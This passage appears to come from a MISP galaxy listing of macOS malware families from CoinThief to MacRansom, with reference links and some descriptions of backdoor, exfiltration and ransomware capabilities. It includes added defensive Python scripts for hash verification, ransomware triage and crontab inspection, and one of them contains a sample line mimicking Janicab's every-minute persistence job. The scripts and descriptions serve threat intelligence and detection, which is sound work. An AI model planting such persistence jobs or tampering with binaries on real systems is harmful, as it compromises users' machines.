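               + b"addr=1GoodAddressPlaceholder\x00" + b"\x00" * 32)
PATCHED_BINARY = GOOD_BINARY.replace(b"1GoodAddressPlaceholder", b"1EvilAddressPlaceholder")
MANIFEST = {"Bitcoin-Qt": sha256_hex(GOOD_BINARY)}   # what the publisher would post


def demo() -> Dict[str, object]:
    return {
        "clean_ok": verify_against_manifest("Bitcoin-Qt", GOOD_BINARY, MANIFEST),
        "patched_ok": verify_against_manifest("Bitcoin-Qt", PATCHED_BINARY, MANIFEST),
        "patched_ranges": diff_ranges(GOOD_BINARY, PATCHED_BINARY),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

The manifest must come from a channel the attacker does not control (a signed release page, not the same download mirror); on macOS, pair the hash check with `codesign --verify --deep --strict` on the application bundle, since a patcher that rewrites the main executable breaks the bundle's signature.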
Internal MISP references
UUID 70e73da7-21d3-4bd6-9a0e-0c904e6457e8
which can be used as unique global reference for CoinThief
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Coldroot RAT
Internal MISP references
UUID 076a7ae0-f4b8-45c7-9de4-dc9cc7e54bcf
which can be used as unique global reference for Coldroot RAT
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Convuster
Internal MISP references
UUID 3819ded3-27ac-4e2f-9cd6-c6ef1642599b
which can be used as unique global reference for Convuster
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
CpuMeaner
Internal MISP references
UUID 74360d1e-8f85-44d1-8ce7-e76afb652142
which can be used as unique global reference for CpuMeaner
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
CreativeUpdater
Internal MISP references
UUID 40fc6f71-75ac-43ac-abd9-c90b0e847999
which can be used as unique global reference for CreativeUpdater
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/osx.creative_updater - webarchive
- https://blog.malwarebytes.com/threat-analysis/2018/02/new-mac-cryptominer-distributed-via-a-macupdate-hack/ - webarchive
- https://digitasecurity.com/blog/2018/02/05/creativeupdater/ - webarchive
- https://objective-see.com/blog/blog_0x29.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Crisis
Internal MISP references
UUID 2bb6c494-8057-4d83-9202-fda3284deee4
which can be used as unique global reference for Crisis
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/osx.crisis - webarchive
- https://www.intego.com/mac-security-blog/new-apple-mac-trojan-called-osxcrisis-discovered-by-intego-virus-team/? - webarchive
- https://www.symantec.com/connect/blogs/crisis-windows-sneaks-virtual-machines - webarchive
- http://contagiodump.blogspot.com/2012/12/aug-2012-w32crisis-and-osxcrisis-jar.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Crossrider
Internal MISP references
UUID 05ddb459-5a2f-44d5-a135-ed3f1e772302
which can be used as unique global reference for Crossrider
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Cthulhu Stealer
Internal MISP references
UUID 549f4c7c-55e3-478e-a84e-e27c5e195c97
which can be used as unique global reference for Cthulhu Stealer
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Dacls (OS X)
According to PCrisk, Dacls is a remote access Trojan (RAT), a malicious program that lets its operators control infected computers remotely.
Research ties this malware to the Lazarus Group; it targets Linux, Windows and, in the variant tracked here, macOS. Typically, cyber criminals use RATs to steal sensitive, confidential information and to infect systems with other malware. No RAT is harmless, and an infection should be removed immediately.
Internal MISP references
UUID 81def650-f52e-49a3-a3fe-cb53ffa75d67
which can be used as unique global reference for Dacls (OS X)
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/osx.dacls - webarchive
- https://blog.trendmicro.com/trendlabs-security-intelligence/new-macos-dacls-rat-backdoor-show-lazarus-multi-platform-attack-capability - webarchive
- https://blog.trendmicro.com/trendlabs-security-intelligence/new-macos-dacls-rat-backdoor-show-lazarus-multi-platform-attack-capability/ - webarchive
- https://objective-see.com/blog/blog_0x57.html - webarchive
- https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf - webarchive
- https://objective-see.com/blog/blog_0x5F.html - webarchive
- https://securelist.com/apt-trends-report-q2-2020/97937/ - webarchive
- https://www.sygnia.co/mata-framework - webarchive
- https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/ - webarchive
- https://blog.malwarebytes.com/threat-analysis/2020/05/new-mac-variant-of-lazarus-dacls-rat-distributed-via-trojanized-2fa-app/ - webarchive
- https://www.sentinelone.com/blog/four-distinct-families-of-lazarus-malware-target-apples-macos-platform/ - webarchive
- https://securelist.com/mata-multi-platform-targeted-malware-framework/97746/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
DarthMiner
Internal MISP references
UUID a8e71805-014d-4998-b21e-3125da800124
which can be used as unique global reference for DarthMiner
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
DazzleSpy
Internal MISP references
UUID ba2c7d3c-7f7a-42f7-854c-a6cc0b5eb850
which can be used as unique global reference for DazzleSpy
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Dockster
Internal MISP references
UUID 713d8ec4-4983-4fbb-827c-2ef5bc0e6930
which can be used as unique global reference for Dockster
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Dummy
Internal MISP references
UUID cbf9ff89-d35b-4954-8873-32f59f5e4d7d
which can be used as unique global reference for Dummy
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Eleanor
Eleanor comes as a drag-and-drop file utility called EasyDoc Converter. This application bundle wraps a shell script that uses the Dropbox name as a disguise and installs three components: a hidden Tor service, a Pastebin agent and a web service with a PHP-based graphical interface.
The Tor service transforms the victim’s computer into a server that provides attackers with full anonymous access to the infected machine via Tor-generated address.
The Pastebin agent uploads the address in encrypted form to the Pastebin website where the attackers can obtain it.
The web service is the main malicious component that provides the attackers with the control over the infected machine. After successful authentication, the interface offers several control panels to the attackers, allowing them to do the following actions:
- Managing files
- Listing processes
- Connecting to various database management systems such as MySQL or SQLite
- Connecting via bind/reverse shell
- Executing shell commands
- Capturing and browsing images and videos from the victim’s webcam
- Sending emails with an attachment
Internal MISP references
UUID c221e519-fe3e-416e-bc63-a2246b860958
which can be used as unique global reference for Eleanor
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
ElectroRAT
According to PCrisk, ElectroRAT is a Remote Access Trojan (RAT) written in the Go programming language and designed to target Windows, macOS and Linux users. The cyber criminals behind ElectroRAT mainly target cryptocurrency users. The RAT is distributed via the trojanized Jamm, eTrader and DaoPoker applications.
Internal MISP references
UUID f8ccf928-7d4f-4999-91a5-9222f148152d
which can be used as unique global reference for ElectroRAT
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/osx.electro_rat - webarchive
- https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-old-dogs-new-tricks.pdf - webarchive
- https://www.intezer.com/blog/research/operation-electrorat-attacker-creates-fake-companies-to-drain-your-crypto-wallets/ - webarchive
- https://objective-see.com/blog/blog_0x61.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
EvilOSX
Internal MISP references
UUID 24f3d8e1-3936-4664-b813-74c797b87d9d
which can be used as unique global reference for EvilOSX
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
EvilQuest
According to PCrisk, EvilQuest (also known as ThiefQuest) encrypts files and creates a ransom message, like many other malicious programs of this type. Unlike most ransomware, which appends an extension to the names of encrypted files, it leaves file names unchanged.
It drops "READ_ME_NOW.txt" in each folder that contains encrypted data and displays another ransom message in a pop-up window. Additionally, this malware is capable of detecting whether certain files are stored on the computer, operates as a keylogger, and receives commands from a Command & Control server.
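Because encrypted files keep their original names, a hunt by file extension finds nothing. The script below is an added example, not EvilQuest code or any vendor's tooling: it treats a directory containing READ_ME_NOW.txt (the note name given above) as a hit and flags the high-entropy files next to it, since ciphertext sits near 8 bits per byte while text and most executables sit well below. The sample tree is constructed in a temporary directory, and the entropy cut-off is an assumed tunable.

```python
"""Hunt for files a rename-free ransomware has encrypted, using the ransom
note as the anchor and byte entropy as the signal.  Added example; the
sample tree is constructed in a temp directory."""
import math
import os
import tempfile
from collections import Counter
from typing import Dict, List

RANSOM_NOTE = "READ_ME_NOW.txt"   # note name given in the description above
ENTROPY_THRESHOLD = 7.5           # bits per byte; assumed cut-off
SAMPLE_BYTES = 64 * 1024          # only the head of each file is read


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte (0.0 for empty input, 8.0 for uniform)."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def scan_tree(root: str, threshold: float = ENTROPY_THRESHOLD) -> Dict[str, List[str]]:
    """Return note locations and likely-encrypted files, as paths relative to root."""
    notes: List[str] = []
    suspects: List[str] = []
    for dirpath, _dirs, files in os.walk(root):
        if RANSOM_NOTE not in files:
            continue   # no note here: high entropy alone is not evidence
        notes.append(os.path.relpath(os.path.join(dirpath, RANSOM_NOTE), root).replace(os.sep, "/"))
        for name in files:
            if name == RANSOM_NOTE:
                continue
            path = os.path.join(dirpath, name)
            with open(path, "rb") as fh:
                head = fh.read(SAMPLE_BYTES)
            if len(head) >= 256 and shannon_entropy(head) >= threshold:
                suspects.append(os.path.relpath(path, root).replace(os.sep, "/"))
    return {"notes": sorted(notes), "suspect_files": sorted(suspects)}


def build_demo_tree() -> str:
    """Constructed sample: one directory with a note, one without."""
    root = tempfile.mkdtemp(prefix="evilquest-demo-")
    hit = os.path.join(root, "Documents")
    clean = os.path.join(root, "Pictures")
    os.makedirs(hit)
    os.makedirs(clean)
    with open(os.path.join(hit, RANSOM_NOTE), "w") as fh:
        fh.write("constructed ransom note\n")
    with open(os.path.join(hit, "report.docx"), "wb") as fh:
        fh.write(os.urandom(4096))          # stands in for ciphertext, name unchanged
    with open(os.path.join(hit, "notes.txt"), "w") as fh:
        fh.write("plain english text " * 200)  # low entropy: left alone
    with open(os.path.join(clean, "photo.jpg"), "wb") as fh:
        fh.write(os.urandom(4096))          # high entropy but no note: not flagged
    return root


def demo() -> Dict[str, List[str]]:
    return scan_tree(build_demo_tree())


if __name__ == "__main__":
    print(demo())
```

Compressed and already-encrypted formats (archives, images, disk images) are also near 8 bits per byte, which is why the scan only looks inside directories that carry the note; on a real host, run it over user home directories and treat the flagged list as a triage queue, not a verdict.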
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular EvilQuest.
Known Synonyms |
---|
ThiefQuest |
Internal MISP references
UUID d5b39223-a8cc-4d47-8030-1d7d6312d351
which can be used as unique global reference for EvilQuest
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/osx.evilquest - webarchive
- https://www.bleepingcomputer.com/news/security/evilquest-wiper-uses-ransomware-cover-to-steal-files-from-macs/ - webarchive
- https://www.sentinelone.com/labs/defeating-macos-malware-anti-analysis-tricks-with-radare2/ - webarchive
- https://labs.sentinelone.com/breaking-evilquest-reversing-a-custom-macos-ransomware-file-encryption-routine/ - webarchive
- https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf - webarchive
- https://objective-see.com/blog/blog_0x5F.html - webarchive
- https://www.crowdstrike.com/blog/how-crowdstrike-analyzes-macos-malware-to-optimize-automated-detection-capabilities - webarchive
- https://twitter.com/dineshdina04/status/1277668001538433025 - webarchive
- https://objective-see.com/blog/blog_0x59.html - webarchive
- https://github.com/gdbinit/evilquest_deobfuscator - webarchive
- https://www.sentinelone.com/blog/evilquest-a-new-macos-malware-rolls-ransomware-spyware-and-data-theft-into-one/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
FailyTale
Internal MISP references
UUID 5dfd704c-a69d-4e93-bd70-68f89fbbb32c
which can be used as unique global reference for FailyTale
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
FinFisher (OS X)
Internal MISP references
UUID 89ce536c-03b9-4f69-83ce-723f26b36494
which can be used as unique global reference for FinFisher (OS X)
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/osx.finfisher - webarchive
- https://reverse.put.as/2020/09/26/the-finfisher-tales-chapter-1/ - webarchive
- https://objective-see.com/blog/blog_0x4F.html - webarchive
- https://objective-see.com/blog/blog_0x5F.html - webarchive
- https://securelist.com/finspy-unseen-findings/104322/ - webarchive
- https://www.amnesty.org/en/latest/research/2020/09/german-made-finspy-spyware-found-in-egypt-and-mac-and-linux-versions-revealed/ - webarchive
- https://netzpolitik.org/2020/our-criminal-complaint-german-state-malware-company-finfisher-raided/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
FlashBack
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular FlashBack.
Known Synonyms |
---|
FakeFlash |
Internal MISP references
UUID f92b5355-f398-4f09-8bcc-e06df6fe51a0
which can be used as unique global reference for FlashBack
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/osx.flashback - webarchive
- https://news.drweb.com/show/?c=5&i=2386&lng=en - webarchive
- http://contagiodump.blogspot.com/2012/04/osxflashbacko-sample-some-domains.html - webarchive
- https://en.wikipedia.org/wiki/Flashback_(Trojan) - webarchive
- http://contagiodump.blogspot.com/2012/04/osxflashbackk-sample-mac-os-malware.html - webarchive
- https://web-assets.esetstatic.com/wls/200x/white-papers/osx_flashback.pdf - webarchive
- https://www.crowdstrike.com/blog/how-crowdstrike-analyzes-macos-malware-to-optimize-automated-detection-capabilities - webarchive
- https://www.alienvault.com/blogs/labs-research/os-x-malware-samples-analyzed - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
FruitFly
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular FruitFly.
Known Synonyms |
---|
Quimitchin |
Internal MISP references
UUID a517cdd1-6c82-4b29-bdd2-87e281227597
which can be used as unique global reference for FruitFly
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/osx.fruitfly - webarchive
- https://objectivebythesea.com/v3/talks/OBTS_v3_tReed.pdf - webarchive
- https://arstechnica.com/security/2017/07/perverse-malware-infecting-hundreds-of-macs-remained-undetected-for-years/ - webarchive
- https://arstechnica.com/security/2017/01/newly-discovered-mac-malware-may-have-circulated-in-the-wild-for-2-years/ - webarchive
- https://blog.malwarebytes.com/threat-analysis/2017/01/new-mac-backdoor-using-antiquated-code/ - webarchive
- https://www.documentcloud.org/documents/4346338-Phillip-Durachinsky-Indictment.html - webarchive
- https://www.virusbulletin.com/virusbulletin/2017/11/vb2017-paper-offensive-malware-analysis-dissecting-osxfruitflyb-custom-cc-server/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
FULLHOUSE
FULLHOUSE (also tracked as FULLHOUSE.DOORED) is a custom backdoor used by subsets of the North Korean Lazarus Group. It is written in C/C++ and combines a tunneler with backdoor commands for shell command execution, file transfer, file management, and process injection. C2 communication takes place over HTTP and requires configuration through the command line or a configuration file.
Internal MISP references
UUID 2ab781d8-214d-41e2-acc9-23ded4f77663
which can be used as unique global reference for FULLHOUSE
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
GIMMICK (OS X)
GIMMICK is the macOS variant, written in Objective-C, of a multi-platform malware family; the name was given by Volexity. It is a file-based C2 implant used by Storm Cloud.
Internal MISP references
UUID 0e259d0f-717a-4ced-ac58-6fe9d72e2c96
which can be used as unique global reference for GIMMICK (OS X)
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Gmera
According to PCrisk, GMERA (also known as the Kassi trojan) is malicious software that disguises itself as Stockfolio, a legitimate trading app for Mac users.
Research shows two variants of this malware, detected as Trojan.MacOS.GMERA.A and Trojan.MacOS.GMERA.B. Cyber criminals distribute GMERA to steal various information and upload it to a website under their control. To avoid damage caused by this malware, remove GMERA immediately.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Gmera.
Known Synonyms |
---|
Kassi |
StockSteal |
Internal MISP references
UUID 1c65cf4e-5df4-4d56-a414-7b05f00814ba
which can be used as unique global reference for Gmera
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/osx.gmera - webarchive
- https://www.welivesecurity.com/2020/07/16/mac-cryptocurrency-trading-application-rebranded-bundled-malware/ - webarchive
- https://blog.trendmicro.com/trendlabs-security-intelligence/mac-malware-that-spoofs-trading-app-steals-user-information-uploads-it-to-website/ - webarchive
- https://objective-see.com/blog/blog_0x53.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
HiddenLotus
According to Malwarebytes, the HiddenLotus "dropper" is an application named Lê Thu Hà (HAEDC).pdf, using the old trick of disguising itself as a document, in this case an Adobe Acrobat file.
Internal MISP references
UUID fc17e41f-e9f7-4442-a05c-7a19b9174c39
which can be used as unique global reference for HiddenLotus
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
HLOADER
Internal MISP references
UUID 28304d68-689e-4488-80cb-d5b7b50a8d57
which can be used as unique global reference for HLOADER
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
HZ RAT (OS X)
Internal MISP references
UUID 37f37678-c8c3-44d7-82bd-ecb452fba012
which can be used as unique global reference for HZ RAT (OS X)
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
iMuler
The threat was multi-stage malware that displayed a decoy appearing to the victim as a Chinese-language article on the long-running dispute over the Diaoyu Islands, an array of erotic pictures, or images of Tibetan organisations. It consisted of two stages: Revir was the dropper/downloader and iMuler the backdoor, capable of the following operations:
- capture screenshots
- exfiltrate files to a remote computer
- send various information about the infected computer
- extract ZIP archive
- download files from a remote computer and/or the Internet
- run executable files
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular iMuler.
Known Synonyms |
---|
Revir |
Internal MISP references
UUID 261fd543-60e4-470f-af28-7a9b17ba4759
which can be used as unique global reference for iMuler
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/osx.imuler - webarchive
- https://nakedsecurity.sophos.com/2012/11/13/new-mac-trojan/ - webarchive
- http://contagiodump.blogspot.com/2012/11/group-photoszip-osxrevir-osximuler.html - webarchive
- https://www.welivesecurity.com/2012/03/16/osximuler-updated-still-a-threat-on-mac-os-x/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Interception (OS X)
Internal MISP references
UUID d4f7ea92-04e7-405c-9faf-7993ffd5c473
which can be used as unique global reference for Interception (OS X)
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/osx.interception - webarchive
- https://twitter.com/ESETresearch/status/1559553324998955010 - webarchive
- https://labs.k7computing.com/index.php/lazarus-apts-operation-interception-uses-signed-binary/ - webarchive
- https://www.sentinelone.com/blog/lazarus-operation-interception-targets-macos-users-dreaming-of-jobs-in-crypto - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Janicab (OS X)
According to Patrick Wardle, this malware persists a Python script as a cron job. Steps:
1. The Python installer first saves any existing cron jobs into a temporary file named '/tmp/dump'.
2. It appends its new job to this file.
3. Once the new cron job has been added, 'python (~/.t/runner.pyc)' runs every minute.
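The persistence described above leaves a distinctive footprint in the user's crontab: a job that fires every minute and runs the Python interpreter on compiled bytecode kept in a hidden directory under the home folder. The following is an added detection example, not code from the page or from any of the cited analyses; it parses `crontab -l` style output and scores each job on those three traits. The sample crontab is constructed for the example, with two benign entries for contrast.

```python
import re
from typing import Dict, List

# Constructed sample in the form `crontab -l` prints it. The last line mimics
# the Janicab job described above; the other two are benign entries.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/local/bin/backup.sh --quiet
*/15 * * * * /usr/bin/python3 /Users/alice/scripts/sync.py
* * * * * python ~/.t/runner.pyc
"""

# Five schedule fields followed by the command. @reboot-style specials are
# deliberately not handled here; they would need their own rule.
CRON_LINE = re.compile(r"^(\S+)\s+(\S+)\s+(\S+)\s+(\S+)\s+(\S+)\s+(.+)$")
# A dot-directory directly under the home folder (~/.t/ or /Users/<u>/.t/).
HIDDEN_HOME_PATH = re.compile(r"(~|/Users/[^/\s]+)/\.[^/\s]+/")


def parse_crontab(text: str) -> List[Dict[str, str]]:
    """Split crontab text into jobs; skips comments, blank lines and VAR=value lines."""
    jobs = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or re.match(r"^\w+=", line):
            continue
        m = CRON_LINE.match(line)
        if not m:
            continue
        minute, hour, dom, mon, dow, command = m.groups()
        jobs.append({"schedule": " ".join((minute, hour, dom, mon, dow)),
                     "minute": minute, "command": command})
    return jobs


def suspicious_cron_jobs(text: str) -> List[Dict[str, str]]:
    """Return jobs showing at least two of: every-minute schedule, python on a
    .pyc payload, payload stored in a hidden directory under the home folder."""
    findings = []
    for job in parse_crontab(text):
        cmd = job["command"]
        reasons = []
        if job["minute"] == "*":
            reasons.append("runs every minute")
        if re.search(r"\bpython[0-9.]*\b", cmd) and ".pyc" in cmd:
            reasons.append("python executing compiled bytecode")
        if HIDDEN_HOME_PATH.search(cmd):
            reasons.append("payload in hidden directory under home")
        if len(reasons) >= 2:
            findings.append({**job, "reasons": "; ".join(reasons)})
    return findings


if __name__ == "__main__":
    for hit in suspicious_cron_jobs(SAMPLE_CRONTAB):
        print(hit["schedule"], hit["command"], "->", hit["reasons"])
```

Requiring two of the three traits keeps legitimate every-minute monitoring jobs and ordinary Python cron scripts out of the results; on a real host, feed it the output of `crontab -l` for each user.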
Internal MISP references
UUID 01325d85-297f-40d5-b829-df9bd996af5a
which can be used as unique global reference for Janicab (OS X)
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/osx.janicab - webarchive
- https://www.malwarology.com/2022/05/janicab-series-further-steps-in-the-infection-chain/ - webarchive
- https://www.malwarology.com/2022/05/janicab-series-first-steps-in-the-infection-chain/ - webarchive
- https://www.macmark.de/blog/osx_blog_2013-08-a.php - webarchive
- https://www.malwarology.com/2022/05/janicab-series-attibution-and-iocs/ - webarchive
- https://www.malwarology.com/2022/05/janicab-series-the-core-artifact/ - webarchive
- https://www.malwarology.com/posts/5-janicab-part_1/ - webarchive
- https://securelist.com/deathstalker-mercenary-triumvirate/98177/ - webarchive
- https://sec0wn.blogspot.com/2018/12/powersing-from-lnk-files-to-janicab.html - webarchive
- https://archive.f-secure.com/weblog/archives/00002576.html - webarchive
- https://blog.avast.com/2013/07/22/multisystem-trojan-janicab-attacks-windows-and-macosx-via-scripts/ - webarchive
- https://securelist.com/deathstalker-targets-legal-entities-with-new-janicab-variant/108131/ - webarchive
- https://securelist.com/apt-trends-report-q3-2020/99204/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
JokerSpy
Internal MISP references
UUID 171b0695-8cea-4ca6-a3f0-c9a8455ef9de
which can be used as unique global reference for JokerSpy
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
KANDYKORN
Internal MISP references
UUID d314856b-1c07-4f4a-ab3e-eeae38536857
which can be used as unique global reference for KANDYKORN
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
KeRanger
Internal MISP references
UUID 01643bc9-bd61-42e8-b9f1-5fbf83dcd786
which can be used as unique global reference for KeRanger
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/osx.keranger - webarchive
- http://researchcenter.paloaltonetworks.com/2016/03/new-os-x-ransomware-keranger-infected-transmission-bittorrent-client-installer/ - webarchive
- https://objective-see.com/blog/blog_0x16.html - webarchive
- https://www.macworld.com/article/3234650/macs/keranger-the-first-in-the-wild-ransomware-for-macs-but-certainly-not-the-last.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Keydnap
Internal MISP references
UUID 2173605b-bf44-4c76-b75a-09c53bb322d6
which can be used as unique global reference for Keydnap
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/osx.keydnap - webarchive
- https://github.com/eset/malware-ioc/tree/master/keydnap - webarchive
- https://objective-see.com/blog/blog_0x16.html - webarchive
- https://www.welivesecurity.com/2016/08/30/osxkeydnap-spreads-via-signed-transmission-application/ - webarchive
- http://www.welivesecurity.com/2016/07/06/new-osxkeydnap-malware-hungry-credentials/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Kitmos
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Kitmos.
Known Synonyms |
---|
KitM |
Internal MISP references
UUID 8a1b1c99-c149-4339-9058-db3b4084cdcd
which can be used as unique global reference for Kitmos
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Komplex
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Komplex.
Known Synonyms |
---|
JHUHUGIT |
JKEYSKW |
SedUploader |
Internal MISP references
UUID d26b5518-8d7f-41a6-b539-231e4962853e
which can be used as unique global reference for Komplex
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/osx.komplex - webarchive
- https://objective-see.com/blog/blog_0x16.html - webarchive
- http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part1.pdf - webarchive
- https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html - webarchive
- http://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/ - webarchive
- https://blog.malwarebytes.com/threat-analysis/2016/09/komplex-mac-backdoor-answers-old-questions/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Kuiper (OS X)
Internal MISP references
UUID c39087ca-05b7-4374-aff1-116a73f2ba74
which can be used as unique global reference for Kuiper (OS X)
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Lador
Internal MISP references
UUID 9c6b54ce-44a0-4d0c-89cb-6532c8f89d8d
which can be used as unique global reference for Lador
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Lambert (OS X)
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Lambert (OS X).
Known Synonyms |
---|
GreenLambert |
Internal MISP references
UUID 7433f3a8-f53c-4ba0-beff-e312fae9ad39
which can be used as unique global reference for Lambert (OS X)
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Laoshu
Internal MISP references
UUID a13a2cb8-b0e6-483a-9916-f44969a2c42b
which can be used as unique global reference for Laoshu
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Leverage
Internal MISP references
UUID 15daa766-f721-4fd5-95fb-153f5361fb87
which can be used as unique global reference for Leverage
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
LockBit (OS X)
Internal MISP references
UUID 0821b5c8-db48-4d0e-a969-384dbd74a6c9
which can be used as unique global reference for LockBit (OS X)
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/osx.lockbit - webarchive
- https://www.washingtonpost.com/business/2024/02/20/lockbit-ransomware-cronos-nca-fbi/ - webarchive
- https://nationalcrimeagency.gov.uk/news/nca-leads-international-investigation-targeting-worlds-most-harmful-ransomware-group - webarchive
- https://medium.com/@lcam/lighting-the-exfiltration-infrastructure-of-a-lockbit-affiliate-and-more-f57fbb7a4e79 - webarchive
- https://www.europol.europa.eu/media-press/newsroom/news/law-enforcement-disrupt-worlds-biggest-ransomware-operation - webarchive
- https://krebsonsecurity.com/2023/05/russian-hacker-wazawaka-indicted-for-ransomware/ - webarchive
- https://noticeofpleadings.com/crackedcobaltstrike/files/ComplaintAndSummons/1%20-Microsoft%20Cobalt%20Strike%20-%20Complaint(907040021.9).pdf - webarchive
- https://twitter.com/malwrhunterteam/status/1647384505550876675 - webarchive
- https://blog.talosintelligence.com/talos-ir-q2-2023-quarterly-recap/ - webarchive
- https://analyst1.com/lockbit-takedown-operation-cronos-a-long-awaited-psyops-against-ransomware/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
MacDownloader
Internal MISP references
UUID 910d3c78-1a9e-4600-a3ea-4aa5563f0f13
which can be used as unique global reference for MacDownloader
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
MacInstaller
Internal MISP references
UUID d1f8af3c-719b-4f64-961b-8d89a2defa02
which can be used as unique global reference for MacInstaller
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
MacRansom
Internal MISP references
UUID 66862f1a-5823-4a9a-bd80-439aaafc1d8b
which can be used as unique global reference for MacRansom
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
